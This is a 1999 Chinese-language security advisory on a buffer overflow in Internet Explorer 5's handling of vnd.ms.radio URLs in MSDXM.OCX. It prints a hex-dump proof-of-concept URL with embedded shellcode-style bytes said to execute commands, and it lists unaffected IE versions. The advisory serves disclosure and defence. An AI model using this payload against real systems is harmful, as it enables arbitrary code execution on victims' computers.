Microsoft IE5 vnd.ms.radio URL 漏洞发布时间:1999-12-09 更新时间:1999-12-09 严重程度:中 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:客户机模式 受影响系统 WinNT详细描述 IE能处理类型为vnd.ms.radio这样的URL地址作为流音乐的 内容。如果在'vnd.ms.radio'后面加上360个或则更多的 字符,在MSDXM.OCX中将会导致缓冲溢出,并且可能导致 在客户端执行任意代码。 测试代码 下面的演示可以执行命令(xx这里表示命令): ------------------------------------------------ 000 vnd.ms.radio:\\j 010 kwashere9991[C0][89][07][83] 020 [EF][0C]PWWP[FF][15][14][16]0[1D][EB][FE]00 030 0000000000000000 040 0000000000000000 050 0000000000000000 060 0000000000000000 070 0000000000000000 080 0000000000000000 090 0000000000000000 0A0 0000000000000000 0B0 0000000000000000 0C0 0000000000000000 0D0 0000000000000000 0E0 0000000000000000 0F0 0000000000000000 100 0000000000000000 110 0000000000000000 120 0000000000000000 130 0000000000[1D]00000 140 00[1D]000[1D]000[1D]000[1D]0 150 000[1A][6F][36][1D]0000000[1D]0 160 000000[1D]0 ------------------------------------------------ 解决方案 下面的IE版本不存在漏洞: 5.00.2014.0216 5.50.3825.1300 5.00.2920.0000 相关信息 |
